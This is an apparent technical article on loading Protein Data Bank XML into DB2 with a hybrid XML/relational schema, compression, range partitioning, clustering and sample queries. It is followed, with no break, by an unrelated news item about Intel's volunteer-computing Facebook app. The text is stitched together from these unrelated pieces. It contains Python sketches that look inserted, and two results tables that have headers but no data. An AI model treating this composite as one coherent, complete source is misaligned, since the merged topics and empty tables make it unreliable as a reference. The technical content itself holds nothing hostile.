The Protein Data Bank (PDB.org) is a worldwide archive of structural data about biological molecules, mostly proteins. The Protein Data Bank (PDB) is managed by several member organizations responsible for depositing, maintaining, processing, and freely providing this biological data to the scientific community. To provide flexibility, extensibility, and ease of data exchange, the PDB data is available in XML format. This XML format is defined by an XML Schema known as the Protein Data Bank Markup Language (PDBML).

The structural information includes the 3-D coordinates of the atoms of the molecule(s) a protein consists of. These atomic coordinates are also referred to as the 3-D structure or tertiary structure. The tertiary structure of a protein is closely coupled to its function. Thus, knowing the tertiary structure often helps in understanding the protein's intrinsic function. For example, the tertiary structure may be useful to explain diseases or develop new drugs. The tertiary structure can also be exploited to search the PDB for interactions between proteins.

As of December 2010, the Protein Data Bank repository held 70,000 entries (XML documents) that contain more than 500 million atom coordinates. The total uncompressed size is more than 750 GB. Individual XML documents in the PDB range from a few MB to more than 1 GB in size. Based on the rapid growth of the PDB repository in recent years (Figure 1), the size of the PDB is expected to continue to increase significantly. Consequently, searching and analyzing this information is becoming ever more challenging.

Figure 1. Growth of the PDB over the past 20 years

A typical approach to analyzing PDB data is to write a custom application or a set of scripts that search the PDBML documents for the purpose of a very specific research question. The disadvantages of this approach include the facts that:

- Developing custom code each time new research is being conducted is very labor-intensive and time-consuming.
- The performance is often poor because all documents need to be parsed and searched, even if only a subset of them contain relevant information.
- It's often difficult to reuse or combine existing custom code to compose new or different queries against the PDB data.

DB2 V9.7.3 with pureXML was chosen to address these challenges, primarily because DB2 has the scalability and the XML capabilities required to process the expected volumes of PDBML documents. Additionally, DB2 is freely available for non-commercial usage via the IBM Academic Initiative. The goal was to store the PDB information in an efficient database schema, exploit relational and XML indexes for efficient search, and use XQuery and SQL/XML to express even complex queries against the PDB information.

The content of the Protein Data Bank

Before we discuss the DB2 database design for the PDB, it is helpful to understand the PDB data a little bit better. The tertiary structure of a protein is experimentally determined (solved), predominantly by a method called X-ray Diffraction or X-ray Crystallography. Another, less frequently used method is called Solution NMR (Nuclear Magnetic Resonance) or NMR Spectroscopy. The methods for determining (solving) the protein structure lead to differences in how a protein structure is described in the generated XML documents, which is particularly reflected in the XML file sizes.

Proteins are dynamic molecules, which means that their tertiary structures may vary slightly, for example depending on their environment. Due to these variations, NMR methodically determines multiple instances (models) that represent slightly shifted tertiary structures for the same protein. Consequently, XML files with protein data produced by NMR can be very large, such as 100 MB to 1 GB, or more. You will see later in this article how and why we use DB2 range partitioning to separate the first (default) model of a protein from its variations.
Listing 1 shows an extract from one PDBML document. You can see four of the 177 categories of information that can appear in such a document, including the authors of the study and the experimental method used (<PDBx:exptlCategory>). The entry_id attribute represents the unique PDB identifier for this document.

Listing 1. Extract of a sample PDBML document (1BBZ.xml)

...
<PDBx:audit_authorCategory>
  <PDBx:audit_author pdbx_ordinal="1">
    <PDBx:name>Pisabarro, M.T.</PDBx:name>
  </PDBx:audit_author>
  ...
</PDBx:audit_authorCategory>
...
<PDBx:structCategory>
  <PDBx:struct entry_id="1BBZ">
    <PDBx:pdbx_descriptor>ABL TYROSINE KINASE, PEPTIDE P41</PDBx:pdbx_descriptor>
    <PDBx:title>CRYSTAL STRUCTURE OF THE ABL-SH3 DOMAIN COMPLEXED WITH A
      DESIGNED HIGH-AFFINITY PEPTIDE LIGAND: IMPLICATIONS FOR SH3-LIGAND
      INTERACTIONS</PDBx:title>
  </PDBx:struct>
</PDBx:structCategory>
...
<PDBx:struct_keywordsCategory>
  <PDBx:struct_keywords entry_id="1BBZ">
    <PDBx:pdbx_keywords>COMPLEX(TRANSFERASE/PEPTIDE)</PDBx:pdbx_keywords>
    <PDBx:text>COMPLEX (TRANSFERASE-PEPTIDE), SIGNAL TRANSDUCTION, SH3 DOMAIN,
      COMPLEX (TRANSFERASE-PEPTIDE) complex</PDBx:text>
  </PDBx:struct_keywords>
</PDBx:struct_keywordsCategory>
...
<PDBx:exptlCategory>
  <PDBx:exptl entry_id="1BBZ" method="X-RAY DIFFRACTION">
    <PDBx:crystals_number>1</PDBx:crystals_number>
  </PDBx:exptl>
</PDBx:exptlCategory>
...

The test database

Due to time and resource constraints, we decided to use only a subset of the total available PDB data volume to prototype and evaluate the storage, indexing, and querying of PDBML documents in a DB2 database. Therefore, a representative sample of 6,029 documents was selected, which amounts to 83 GB and roughly 10 percent of the total volume of the PDBML archive as of December 2010. This set of documents contains approximately 1.7 billion XML elements, out of which approximately 1.54 billion elements describe tertiary protein structures through atom coordinates and other information.
A representative sample of PDBML documents must accurately reflect the ratio of documents with molecule information produced by X-ray Diffraction (smaller documents, 83 percent of all documents) vs. Solution NMR (larger documents, 16 percent of all documents). This ensures that the database configuration and queries are tested with a realistic mix of small and large documents.

The database server available for this study was a Sun X4600 M2 with eight dual-core processors (AMD Opteron 8220) and 256 GB of main memory. The operating system was Ubuntu 64-bit Linux®. The storage consisted of 10 hard drives (698 GB each; 7,200 rpm), organized as a single logical volume (RAID 5) using a hardware controller.

Database design recommendations for PDB

This section describes a set of database design recommendations that lead to simple and efficient database support for storing and analyzing PDB data. These recommendations address the database schema, the choice between XML and relational storage, the definition of indexes, and the physical data organization with partitioning and clustering options.

Hybrid XML/Relational storage

PDBML documents currently contain up to 177 categories of information, most of them optional. The large number of optional PDBML elements allows the documents to be very flexible and highly variable. A fully relational database schema would require hundreds of tables to represent PDBML. Such a relational database schema for the PDB was developed in 2005 and is shown in Figure 2. With more than 400 tables and more than 3,000 columns, the complexity of this schema is overwhelming. It is extremely difficult to understand and query such a database schema because a single PDB entry is broken up and scattered over hundreds of tables, making it hard for users to know which information resides in which table.
Therefore, keeping most of the PDBML information in its original XML format and storing it in a single XML column results in a much simpler database design and retains the data in a format that users naturally understand.

Figure 2. Diagram of a fully relational database schema for PDBML

One notable exception to the high variability of the PDBML data is the atom coordinates and their related labels, which follow a flat and regular structure repeated for every atom in a molecule, as illustrated in Listing 2. Since proteins commonly consist of thousands or tens of thousands of atoms, atom coordinates often represent 90 percent or more of a PDBML document.

Listing 2. Atom coordinates in a PDBML document

<PDBx:atom_siteCategory>
  <PDBx:atom_site id="1">
    <PDBx:B_iso_or_equiv>37.41</PDBx:B_iso_or_equiv>
    <PDBx:Cartn_x>1.039</PDBx:Cartn_x>
    <PDBx:Cartn_y>16.834</PDBx:Cartn_y>
    <PDBx:Cartn_z>18.876</PDBx:Cartn_z>
    <PDBx:auth_asym_id>A</PDBx:auth_asym_id>
    <PDBx:auth_atom_id>N</PDBx:auth_atom_id>
    <PDBx:auth_comp_id>ASN</PDBx:auth_comp_id>
    <PDBx:auth_seq_id>1</PDBx:auth_seq_id>
    <PDBx:group_PDB>ATOM</PDBx:group_PDB>
    <PDBx:label_alt_id xsi:nil="true" />
    <PDBx:label_asym_id>A</PDBx:label_asym_id>
    <PDBx:label_atom_id>N</PDBx:label_atom_id>
    <PDBx:label_comp_id>ASN</PDBx:label_comp_id>
    <PDBx:label_entity_id>1</PDBx:label_entity_id>
    <PDBx:label_seq_id>1</PDBx:label_seq_id>
    <PDBx:occupancy>1.00</PDBx:occupancy>
    <PDBx:pdbx_PDB_model_num>1</PDBx:pdbx_PDB_model_num>
    <PDBx:type_symbol>N</PDBx:type_symbol>
  </PDBx:atom_site>
  <PDBx:atom_site id="2">
    <PDBx:B_iso_or_equiv>36.15</PDBx:B_iso_or_equiv>
    <PDBx:Cartn_x>-0.213</PDBx:Cartn_x>
    <PDBx:Cartn_y>16.205</PDBx:Cartn_y>
    <PDBx:Cartn_z>18.364</PDBx:Cartn_z>
    ...
  </PDBx:atom_site>
  <PDBx:atom_site id="3">
    <PDBx:B_iso_or_equiv>33.97</PDBx:B_iso_or_equiv>
    <PDBx:Cartn_x>-0.549</PDBx:Cartn_x>
    <PDBx:Cartn_y>16.779</PDBx:Cartn_y>
    <PDBx:Cartn_z>16.986</PDBx:Cartn_z>
    ...
  </PDBx:atom_site>
  ...
</PDBx:atom_siteCategory>

The flat and regular structure of the atom information makes it a perfect fit for traditional relational tables. In fact, the atom coordinates and labels are non-hierarchical data for which XML is not the best choice. Therefore, we decide on a hybrid database schema that stores the atom_site information in a relational table and the remainder of each PDBML document in an XML column, with the <atom_siteCategory> subtree removed from the document. This has several advantages:

- The reduced PDBML documents are much smaller, which improves insert and load performance, as well as XML query performance. The XML parsing effort upon insert or load is reduced by approximately 90 percent.
- The atom information takes less space in relational columns than in its verbose XML representation.
- The atom data can be queried with traditional relational methods, which for non-hierarchical data is more efficient than XML navigation.
- Since each atom is represented in a separate row, indexes can help speed up the search for specific atoms within a given PDBML entry.

The chosen database schema consists of two tables, shown in Listing 3. The first (xmlrpdb.pdbxml) has one row for each PDB entry. This table has only two columns:

- The primary key pdb_id holds the four-character PDB entry identifier from the entry_id XML attribute.
- The XML column pdbxml_file holds the entire PDBML document except the <atom_siteCategory> subtree.

The second table (xmlrpdb.atom_site) contains one relational row for each atom coordinate (i.e., for each <atom_site> element in a PDBML document). pdb_id is the foreign key that links atom coordinates to the corresponding PDBML document in the pdbxml table.

Both tables are stored in table spaces with a 32-KB page size to maximize the performance of analytical queries that read large numbers of rows.

Listing 3.
Hybrid XML/relational database schema for PDB in DB2

CREATE TABLE xmlrpdb.pdbxml (
  pdb_id      CHAR(4) NOT NULL,
  pdbxml_file XML NOT NULL,
  PRIMARY KEY (pdb_id))
  IN ts_data32k INDEX IN ts_index32k;

CREATE TABLE xmlrpdb.atom_site (
  pdb_id             CHAR(4) NOT NULL,
  atom_site_id       INTEGER NOT NULL,
  auth_asym_id       VARCHAR(10) WITH DEFAULT NULL,
  auth_atom_id       VARCHAR(20) NOT NULL,
  auth_comp_id       VARCHAR(3) NOT NULL,
  auth_seq_id        VARCHAR(20) NOT NULL,
  b_iso_or_equiv     DECIMAL(7,3) NOT NULL,
  b_iso_or_equiv_esd DECIMAL(7,3) WITH DEFAULT NULL,
  cartn_x            DECIMAL(7,3) NOT NULL,
  cartn_x_esd        DECIMAL(7,3) WITH DEFAULT NULL,
  cartn_y            DECIMAL(7,3) NOT NULL,
  cartn_y_esd        DECIMAL(7,3) WITH DEFAULT NULL,
  cartn_z            DECIMAL(7,3) NOT NULL,
  cartn_z_esd        DECIMAL(7,3) WITH DEFAULT NULL,
  group_pdb          VARCHAR(10) NOT NULL,
  label_alt_id       VARCHAR(10) WITH DEFAULT NULL,
  label_asym_id      VARCHAR(10) WITH DEFAULT NULL,
  label_atom_id      VARCHAR(20) WITH DEFAULT NULL,
  label_comp_id      VARCHAR(10) NOT NULL,
  label_entity_id    SMALLINT NOT NULL,
  label_seq_id       SMALLINT WITH DEFAULT NULL,
  occupancy          DECIMAL(7,3) NOT NULL,
  occupancy_esd      DECIMAL(7,3) WITH DEFAULT NULL,
  pdbx_pdb_atom_name VARCHAR(10) WITH DEFAULT NULL,
  pdbx_pdb_ins_code  VARCHAR(10) WITH DEFAULT NULL,
  pdbx_PDB_model_num SMALLINT NOT NULL,
  type_symbol        VARCHAR(10) WITH DEFAULT NULL,
  PRIMARY KEY (pdb_id, atom_site_id),
  FOREIGN KEY (pdb_id) REFERENCES xmlrpdb.pdbxml(pdb_id),
  CONSTRAINT group_chk CHECK (group_PDB IN ('ATOM', 'HETATM'))
) IN ts_atom_data_32k INDEX IN ts_atom_index32k;

CHECK constraints can be defined on the pdbxml table to ensure that the four-character PDB identifier conforms to the PDB standard. The first character must be a number between 1 and 9, and each of the next three characters must be a number between 0 and 9 or an uppercase character between A and Z (see Listing 4).
Listing 4. CHECK constraints for the PDB identifier

ALTER TABLE xmlrpdb.pdbxml
  ADD CHECK (SUBSTR(pdb_id, 1, 1) BETWEEN '1' AND '9')
  ADD CHECK ((SUBSTR(pdb_id, 2, 1) BETWEEN '0' AND '9') OR
             (SUBSTR(pdb_id, 2, 1) BETWEEN 'A' AND 'Z'))
  ADD CHECK ((SUBSTR(pdb_id, 3, 1) BETWEEN '0' AND '9') OR
             (SUBSTR(pdb_id, 3, 1) BETWEEN 'A' AND 'Z'))
  ADD CHECK ((SUBSTR(pdb_id, 4, 1) BETWEEN '0' AND '9') OR
             (SUBSTR(pdb_id, 4, 1) BETWEEN 'A' AND 'Z'));

Populating the hybrid database schema

The conceptual process of inserting a PDBML document into our hybrid database schema is illustrated in Figure 3. The atom data needs to be extracted and removed from the XML document and inserted into the atom_site table (blue). The reduced document itself is inserted into the pdbxml table. We call this process atom site separation.

Figure 3. Hybrid storage of a PDBML document with atom site separation

Due to the high data volume, the atom site separation (the population of the hybrid database schema) needs to have high performance. Hence, costly XML parsing should be reduced as much as possible. Revisiting the atom coordinates in XML format in Listing 2, we find that 94.5 percent of the characters are markup and only 5.5 percent of the characters are actual values. Hence, the ratio of markup to value is extremely high, which means that a lot of XML parsing may be required to extract a comparatively small amount of usable data. You will understand shortly how this consideration has affected our decision of how to populate the two tables.

One option to populate the relational table is to use INSERT statements with an XMLTABLE function. Such a statement can parse the entire PDBML document and extract the atom information to insert as relational rows. Additionally, an XQuery Update expression can delete the <atom_siteCategory> subtree from each PDBML document inserted into the pdbxml table.
Such an XQuery Update expression can also be part of the INSERT statement, so that the <atom_siteCategory> subtree is removed before the document is written into the XML column rather than in a separate step after the insert.

Another option is to use a special-purpose preprocessor outside the database to extract the atom data into a relational flat file and remove it from each PDBML document. Such a preprocessor was implemented in C++, and it has the following benefits:

- It can add desirable annotations to the data, such as information from sequence and structure alignments or application-dependent geometric transformations like rotations or translations of atomic coordinates.
- It can be implemented without using a general-purpose XML parser. Instead, it is designed and optimized for the specific file structure of PDBML documents. It exploits special knowledge about the flat structure of the atom data, the existence of newline characters between elements, and other characteristics. As a result, the specialized preprocessor is at least 10 times faster than any solution that relies on XML parsing.

Preprocessing the data set of 6,029 gzipped PDBML documents (83 GB unzipped) and loading the prepared data into the atom_site table took only 1 hour and 44 minutes. The preprocessor is available for download (see Download).

Considering the data volume in the PDB archive as well as its rapid growth, it is useful to compress the data in DB2. This reduces storage consumption and improves performance. Although compression and decompression in DB2 consume some additional CPU cycles, compression also reduces the number of physical I/O operations necessary to read a given amount of data from disk. Furthermore, compressed pages of a DB2 table space remain compressed in the DB2 buffer pool in main memory. As a result, compression allows more data to be held in memory than without compression, which increases the buffer-pool hit ratio and makes better use of the available memory.
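The shortcut the specialized preprocessor takes can be sketched in Python. This is an illustrative stand-in for the downloadable C++ tool, not the tool itself: the PDBx-prefixed element names follow the PDBML convention, the sample coordinate values are invented, and the point is the same one it exploits, that one element per line allows plain string operations instead of a general XML parser.

```python
def extract_atom_values(pdbml_lines, wanted=("Cartn_x", "Cartn_y", "Cartn_z")):
    """Pull scalar values out of flat, one-element-per-line PDBML markup
    using plain string operations instead of a general XML parser."""
    record = {}
    for line in pdbml_lines:
        line = line.strip()
        for tag in wanted:
            open_tag = "<PDBx:%s>" % tag
            close_tag = "</PDBx:%s>" % tag
            if line.startswith(open_tag) and line.endswith(close_tag):
                record[tag] = float(line[len(open_tag):-len(close_tag)])
    return record

# Invented sample in the flat layout the article describes.
sample = [
    "<PDBx:Cartn_x>8.161</PDBx:Cartn_x>",
    "<PDBx:Cartn_y>22.022</PDBx:Cartn_y>",
    "<PDBx:Cartn_z>-10.574</PDBx:Cartn_z>",
]
```

Because the extractor never builds a document tree, its cost is proportional to the input size alone, which is how the real preprocessor avoids paying for the 94.5 percent of characters that are markup.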
We found that the I/O and memory benefits of compression outweigh the additional CPU cost and lead to overall higher performance. The commands in Listing 5 were used to compress both tables.

Listing 5. Enabling compression and reorganizing the tables

ALTER TABLE xmlrpdb.pdbxml COMPRESS YES;
REORG TABLE xmlrpdb.pdbxml LONGLOBDATA RESETDICTIONARY;
ALTER TABLE xmlrpdb.atom_site COMPRESS YES;
REORG TABLE xmlrpdb.atom_site LONGLOBDATA RESETDICTIONARY;

The reduction in space consumption is summarized in Table 1. After compression, the information contained in the 6,029 PDBML documents can be stored in 67.4 percent fewer pages, i.e., in roughly one third of the space required without compression.

Table 1. Space savings achieved by compression

|                   | Before compression | After compression | Savings      |
| xmlrpdb.pdbxml    | 176,256 pages      | 44,736 pages      | 74.6 percent |
| xmlrpdb.atom_site | 264,960 pages      | 99,264 pages      | 62.5 percent |
| Total             | 441,216 pages      | 144,000 pages     | 67.4 percent |

With a page size of 32 KB, the final storage of 144,000 pages is equivalent to 4.4 GB, which is only 5.3 percent of the original raw data volume of 83 GB. If we extrapolate this ratio to the total current size of the PDB archive, the 0.75 TB of PDB information would be stored in DB2 using only approximately 40.7 GB of space, plus some space for indexes. This tremendous storage saving stems from two factors. First, the high ratio of markup to value in the atom information is eliminated by converting the atom coordinates to relational format in the preprocessing step. Second, DB2 compression shrinks the remaining XML and relational data by a factor of three.

Despite the significant reduction in space consumption, the PDB data volume continues to grow quickly. Also, the response time of complex analytical queries can be reduced by spreading the data across multiple database partitions, such that all partitions work on their assigned data in parallel.
These database partitions can reside on the same machine to exploit all the CPU power of a multi-core system, or they can be spread across multiple machines in a shared-nothing configuration. The DB2 Database Partitioning Feature (DPF) is available through IBM InfoSphere® Warehouse, a software package that contains DB2 with advanced features, as well as additional design, reporting, and database management tools.

Using the DPF, we recommend distributing the data in the pdbxml table and the atom_site table across the database partitions by hashing on the values of the pdb_id column. This is achieved by adding the clause DISTRIBUTE BY HASH(pdb_id) to the respective CREATE TABLE statement. The large number of distinct values in the pdb_id column ensures a relatively even distribution of rows over the database partitions. Distributing both tables by hashing on their join key (pdb_id) ensures that all atom rows for a given PDBML document are stored in the same database partition as the PDBML document itself. This collocation implies that joins between the two tables can always be evaluated within each of the database partitions and never require data to be shipped across partitions.

Range partitioning (also known as table partitioning) enables you to partition the data in a table according to the value in a specified column, such that rows with the same value reside in the same partition. Range partitioning is orthogonal to database partitioning. If database partitioning and range partitioning are used together, the rows in a table are first hashed across the database partitions and then range-partitioned within each database partition.

Range partitioning can serve multiple purposes. One purpose is easier roll-in and roll-out of new and old data, respectively. Another is to improve performance through partition elimination, when the DB2 query optimizer determines that only a subset of the partitions needs to be examined to answer a particular query.
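The collocation argument above can be sketched in Python. The partition count and the CRC32 stand-in hash are illustrative, and DB2's internal hash function differs, but the property is the same: equal join keys always map to the same partition, so a document row and all of its atom rows land together.

```python
import zlib

N_PARTITIONS = 4  # illustrative; a real system sizes this to its hardware

def partition_of(pdb_id):
    """Map a pdb_id to a database partition by hashing the shared key.
    CRC32 stands in for DB2's internal (different) hash function."""
    return zlib.crc32(pdb_id.encode("ascii")) % N_PARTITIONS

# Both tables use the same function on the same key, so a join on pdb_id
# never crosses partitions: the pdbxml row and every one of its atom_site
# rows receive the same partition number.
docs = ["2VB1", "2B97", "2OV0"]
atom_rows = [(pid, i) for pid in docs for i in range(3)]
```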
For the PDB, range partitioning was deployed to benefit from partition elimination rather than to simplify roll-in and roll-out of data. We decided to range-partition the table by the pdbx_PDB_model_num column for the following reason: remember that the tertiary structure of a protein can be experimentally determined with a method called NMR, which produces multiple tertiary structures for the same protein. These variations are called models and are numbered by the field pdbx_PDB_model_num. A value of pdbx_PDB_model_num = 1 identifies the first (default) model of a protein. The additional variations are the non-default models of the same protein and have pdbx_PDB_model_num >= 2. Proteins that have been structurally determined by X-ray diffraction have only one model with pdbx_PDB_model_num = 1.

Listing 6 shows the extended definition of the atom_site table with range partitioning. All atom coordinates that belong to the first model (pdbx_PDB_model_num = 1) are stored in one partition, whereas any variations (pdbx_PDB_model_num >= 2) are stored in another. Although only about 16 percent of all proteins currently in the PDB have variations produced by NMR, the number of their variations is so large that both partitions have roughly the same number of records.

Listing 6. Table definition with range partitioning

CREATE TABLE xmlrpdb.atom_site (
  pdb_id              CHAR(4) NOT NULL,
  ...
  pdbx_PDB_model_num  SMALLINT NOT NULL,
  type_symbol         VARCHAR(10) WITH DEFAULT NULL,
  PRIMARY KEY (pdb_id, atom_site_id),
  FOREIGN KEY (pdb_id) REFERENCES xmlrpdb.pdbxml(pdb_id),
  CONSTRAINT group_chk CHECK (group_PDB in ('ATOM', 'HETATM'))
)
-- IN ts_atom_data_32k INDEX IN ts_atom_index32k
PARTITION BY RANGE (pdbx_PDB_model_num) (
  PARTITION DEF_MODELS     STARTING (1) ENDING (1)        IN TS_ATOM_DATA1_32K,
  PARTITION NON_DEF_MODELS STARTING (2) ENDING (MAXVALUE) IN TS_ATOM_DATA2_32K
);

We have chosen this range-partitioning scheme because many PDB queries differentiate between default and non-default protein models and can therefore benefit from the partitioning. For example, a query that analyzes all or most of the default models only needs to scan the partition DEF_MODELS, which cuts the required I/O roughly in half.

In addition to range partitioning, multi-dimensional clustering (MDC) can be used to cluster the rows in a table based on one or more columns. Rows that have the same value in the clustering columns are physically stored together in the same storage cell. This can greatly improve the performance of queries that constrain and select data along one or multiple clustering dimensions. Like the DPF, MDC is also available through IBM InfoSphere Warehouse.

The choice of clustering columns needs to be based on the expected query workload, so that the clustering supports the most common and most critical queries. For example, many PDB queries might search the atom data based on the amino acid involved. Therefore, it can be beneficial to cluster the atom_site table based on the column label_comp_id, which, in most documents, contains the three-letter code for the amino acid. This clustering is achieved by adding the corresponding clustering clause to the CREATE TABLE statement for the atom_site table. Another example is to cluster on the group_PDB column.
We have evaluated this clustering for several sample queries that restrict their search to a single group_PDB value ('HETATM') and found that it can improve query performance fourfold.

PDB queries and performance

In this section, we discuss two sample queries to demonstrate:

- The ease with which even complex analysis of PDB data can be carried out.
- The benefit of the database design decisions described in the previous sections.

The query in Listing 7 selects the PDB identifier, the resolution, and the description from all PDB entries where the experimental method is "X-RAY DIFFRACTION" and the resolution (ls_d_res_high) is at most 2.5. The resolution is expressed in Ångström (1 Å = 0.1 nanometer) and serves as a quality metric for the analysis of the atom structures. Structures with a resolution less than 2 Å are high-resolution structures (i.e., the locations of their atoms could be determined very accurately). Structures with a resolution greater than 3 Å are less accurate and usually ignored.

Listing 7. Query the top 10 records with the best X-ray resolution

SELECT pdb_id, x.resolution, x.pdbx_descriptor
FROM xmlrpdb.pdbxml,
     XMLTABLE ('$PDBXML_FILE/*:datablock/*:refineCategory/*:refine[
                  @pdbx_refine_id = "X-RAY DIFFRACTION" and *:ls_d_res_high <= 2.5 ]'
       COLUMNS
         resolution      DEC(9,5)      PATH '*:ls_d_res_high',
         pdbx_descriptor VARCHAR(2000) PATH '../../*:structCategory/*:struct/*:pdbx_descriptor'
     ) AS x
-- WHERE
--   upper(x.pdbx_descriptor) LIKE '%UNKNOWN%' or
--   upper(x.pdbx_descriptor) LIKE '%UNCHARACTERIZED%'
ORDER BY x.resolution
FETCH FIRST 10 ROWS ONLY;

The result of this query is shown in Listing 8. One of the benefits of using DB2 pureXML as opposed to custom code is that it is easy to modify SQL/XML queries to refine the search. For example, Listing 7 contains three comment lines with an additional clause. They can be used to further filter the descriptor to find those structures that have not been, or could not yet be, characterized.

Listing 8. Result produced by the query in Listing 7

PDB_ID  RESOLUTION  PDBX_DESCRIPTOR
------  ----------  -------------------------------------------------
2VB1    0.65000     LYSOZYME C (E.C. 3.2.1.17)
2B97    0.75000     Hydrophobin II
2OV0    0.75000     PROTEIN
2I16    0.81000     Aldose reductase (E.C. 1.1.1.21)
2I17    0.81000     Aldose reductase (E.C. 1.1.1.21)
2HS1    0.84000     HIV-1 Protease V32I mutant (EC 3.4.23.16)
2F01    0.85000     Streptavidin
2OL9    0.85000     SNQNNF peptide from human prion residues 170-175
2PF8    0.85000     Aldose reductase (E.C. 1.1.1.21)
2P74    0.88000     Beta-lactamase CTX-M-9a (E.C. 3.5.2.6)

10 record(s) selected.

The predicates in the query in Listing 7 are weakly selective, so a full scan of the table is required. Table 2 summarizes how the performance of this table-scan query has benefited from two of our design decisions: atom site separation and compression. In our environment, this table scan was I/O-bound. DB2 compression mitigated the I/O bottleneck and reduced the query elapsed time by more than 40 percent (from 244 to 128 seconds). Extracting the atom site data into a separate relational table greatly reduced the size of the pdbxml table, improving the query performance by almost 4.5 times, from 138 to 31 seconds.

Table 2. Response times (without indices) of the query in Listing 7

| Atom site separation | Compression | Response time |

Listing 9 shows another sample query, which determines how often different atoms, or ions, occur in different compounds. The WHERE clause restricts the search to so-called hetero atoms and only considers the first model of each protein.

Listing 9. Analysis of hetero atom occurrences

SELECT label_atom_id AS "Atom",
       COALESCE(label_comp_id, 'none') AS "Compound",
       COUNT(*) AS "Occurrences"
FROM xmlrpdb.atom_site
WHERE group_PDB = 'HETATM'
  AND pdbx_PDB_model_num = 1
GROUP BY label_atom_id, label_comp_id
ORDER BY COUNT(*) DESC, label_comp_id;

A subset of the result rows is shown in Listing 10.
The most frequently detected chemical compound is water (HOH), with oxygen (O) as one of its atoms. The reported number of hydrogens, denoted by H1 and H2 for HOH, is low because detecting hydrogens requires a very high resolution that is not always achieved. (Human) hemoglobin is a protein consisting of multiple molecules, and such a molecule can interact with a non-protein compound called heme. A heme (HEM) is a multi-atom, non-proteinaceous organic structure capable of positioning an iron (FE) ion in its center. This iron ion, in turn, is critical for oxygen binding. The result in Listing 10 shows that iron occurs frequently together with heme compounds. Although this is a simple example, it demonstrates how efficient it has become to detect meaningful correlations in the PDB data and to gain a better understanding of how proteins function and interact on a molecular level.

Listing 10. Subset of the result produced by the query in Listing 9

Atom      Compound        Occurrences
--------  --------------  -----------
O         HOH                 1571965
MG        MG                     7159
...
H1        HOH                    1858
H2        HOH                    1858
ZN        ZN                     1664
...
CL        CL                     1318
CA        CA                     1295
...
FE        HEM                     379
NA        HEM                     379

Table 3 shows how our database design choices for atom site separation, compression, range partitioning, and multi-dimensional clustering can provide excellent performance, even when no query-specific indexes exist.

Table 3. Response times (without indices) of the query in Listing 9

| Atom site separation | Compression | Range partitioning | MDC | Response time |

This article has described how to use pureXML and relational data management features in DB2 to efficiently store and query the Protein Data Bank (PDB). Based on the intrinsic characteristics of the protein data, we have designed an optimized hybrid database schema. For best performance and minimal space consumption, we recommend using database partitioning, range partitioning, compression, and multi-dimensional clustering.
Additionally, a combination of XML indexes and relational indexes can further improve query performance. The DB2-based PDB continues to be used for investigations, such as searching the entire PDB for certain protein interactions and helping to explain unusual interactions on the structural level.

The development of the DB2-based PDB was done in the Structural Bioinformatics research group of Maria Teresa Pisabarro, Biotechnology Center, Technical University Dresden, Germany. The project was financed by a scholarship from the foundation of SAP co-founder Klaus Tschira. Thanks also to Henrik Loeser for his help with the work described in this article, and to the Berlin Institute of Medical Systems Biology (BIMSB) of the Max Delbrück Center (MDC) for Molecular Medicine Berlin-Buch, Germany, for providing the production server.

| C++ preprocessor and a few DB2 sample queries | db2pdb_download.zip | 965 KB |

- Visit PDB.org for more information about the Protein Data Bank and the XML format PDBML.
- Learn more about the XML format PDBML.
- For an introduction to PDB data, read "Understanding PDB Data: Looking at Structures."
- Get the full XML document from which extracts are shown in Listings 1 and 2.
- Gain comprehensive knowledge of DB2 pureXML with the DB2 pureXML Cookbook.
- Read more about compression, partitioning, and clustering of XML data in the article "Enhance business insight and scalability of XML data with new DB2 9.7 pureXML features."
- For more DB2 pureXML resources, explore the DB2 pureXML enablement wiki.
- Read the Native XML Database blog to stay up to date on the latest news and XML tips and tricks.
Intel has developed a Facebook application that allows users to donate their spare processing power to help fight disease and combat climate change.

Using peer-to-peer computing, researchers break up complex computational tasks into pieces of work that can be farmed out to PCs. If hundreds or thousands of PCs participate, the combined computing power can be used over time to solve complex calculations, as the SETI programme does in its search for signs of extraterrestrial life.

Intel's Facebook peer-to-peer application, Progress Thru Processors, allows users to donate their PCs' unused processor power to research projects such as Rosetta@home, which uses the additional computing power to help find cures for cancer and other diseases such as HIV and Alzheimer's.

Climateprediction.net is dedicated to increased understanding of global climate change by predicting the Earth's climate and testing the accuracy of climate models.

Africa@home is currently focused on finding optimal strategies to combat malaria by studying simulation models of disease transmission and the potential impact of new anti-malarial drugs and vaccines.

The application automatically directs a computer's idle processor power to fuel researchers' computational efforts, Intel said. The application activates only when a PC's performance is not being fully used. When the participant's computer usage demands more processor performance, the application defers and sits idle until spare processing capacity becomes available again.

Intel said the application runs automatically as a background process on a PC and will not affect performance or any other tasks. Additionally, Progress Thru Processors does not require participants to leave their computers powered up unnecessarily.
By keeping their PCs on only as they normally would, participants will still be contributing to life-changing research, according to Intel. Progress Thru Processors was developed in collaboration with the National Science Foundation-funded BOINC project at the University of California, Berkeley. Marketing and creative work for Progress Thru Processors was provided by noise, a New York-based marketing agency.
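The farm-out-and-aggregate pattern behind such volunteer-computing projects can be sketched in Python. This is a sequential stand-in with an invented toy workload; real platforms such as BOINC add scheduling, result validation, redundancy, and checkpointing.

```python
def split_work(task_range, n_workers):
    """Split a large range of work units into roughly equal chunks."""
    lo, hi = task_range
    step = (hi - lo + n_workers - 1) // n_workers  # ceiling division
    return [(lo + i * step, min(lo + (i + 1) * step, hi))
            for i in range(n_workers) if lo + i * step < hi]

def worker(chunk):
    """Stand-in for a donated-CPU computation: sum the chunk's integers."""
    lo, hi = chunk
    return sum(range(lo, hi))

def run_project(task_range, n_workers):
    """Farm chunks out (here sequentially) and aggregate the partial results."""
    return sum(worker(chunk) for chunk in split_work(task_range, n_workers))
```

The key property is that the aggregate over chunks equals the result of the whole computation, which is what lets thousands of independent PCs stand in for one large machine.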
